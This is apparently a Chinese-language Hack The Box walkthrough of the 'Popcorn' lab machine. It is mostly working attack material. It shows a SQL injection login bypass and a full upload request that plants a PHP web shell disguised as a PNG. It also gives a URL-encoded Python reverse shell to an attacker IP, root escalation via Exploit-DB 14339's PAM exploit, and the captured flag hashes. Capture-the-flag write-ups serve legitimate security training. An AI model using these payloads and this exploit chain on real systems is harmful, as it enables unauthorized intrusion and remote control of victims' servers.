信息收集
IP Address | Opening Ports |
---|---|
10.10.10.6 | TCP:22,80 |
$ nmap -p- 10.10.10.6 --min-rate 1000 -sC -sV
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLI & 文件上传
# echo '10.10.10.6 popcorn.htb'>>/etc/hosts
$ feroxbuster --url http://popcorn.htb/
http://popcorn.htb/torrent/login.php
username:admin' or '1'='1
password:xxx
http://popcorn.htb/torrent/torrents.php?mode=upload
$ wget https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso.torrent -O 1.torrent
http://popcorn.htb/torrent/torrents.php?mode=details&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
php
POST /torrent/upload_file.php?mode=upload&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc HTTP/1.1
Host: popcorn.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------356668434211973508953699136894
Content-Length: 378901
Origin: http://popcorn.htb
Connection: close
Referer: http://popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
Cookie: /torrent/login.php=; saveit_0=1; saveit_1=0; /torrent/torrents.php=; /torrent/=; /torrent/index.php=; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=8d214a4d51e6d9b98fb3d5ea8cec6e45
Upgrade-Insecure-Requests: 1
-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="file"; filename="Screenshot 2024-08-16 182829.png.php"
Content-Type: image/png
<?php system($_GET[1]);phpinfo();?>
-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="submit"
Submit Screenshot
-----------------------------356668434211973508953699136894--
http://popcorn.htb/torrent/upload/
http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=dir
$ curl 'http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10032%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27'
User.txt
5cdfb68827912b249896490a60bf420c
权限提升
$ uname -a
使用 ls -lAR /home/george
命令显示了 .cache 目录下一个不常见的文件 motd.legal-displayed。经过一些研究,发现 Exploit-DB 14339 提到 PAM 1.1.0 存在一个文件篡改的特权升级漏洞。通过这个漏洞,可以在目标机器上执行脚本以获得 root 权限。请注意,需要一个交互式的 shell,可以通过在非交互式 shell 中运行命令 python -c 'import pty; pty.spawn("/bin/sh")' 来获取。可以从 /root/root.txt 获取 root 标志。
motd.legal-displayed 是 PAM(Pluggable Authentication Modules)相关的一个文件,用于存储关于"Message of the Day"(MOTD,登录欢迎信息)的法律声明或其他类似信息。在某些 PAM 配置中,它可能用于记录用户是否已经查看过这些信息,以便在用户每次登录时进行相关的提示或处理。
https://www.exploit-db.com/exploits/14339
$ chmod +x exp.sh
$ ./exp.sh
Root.txt
d87c02b4781a36f55ea99c8c8fbf4d20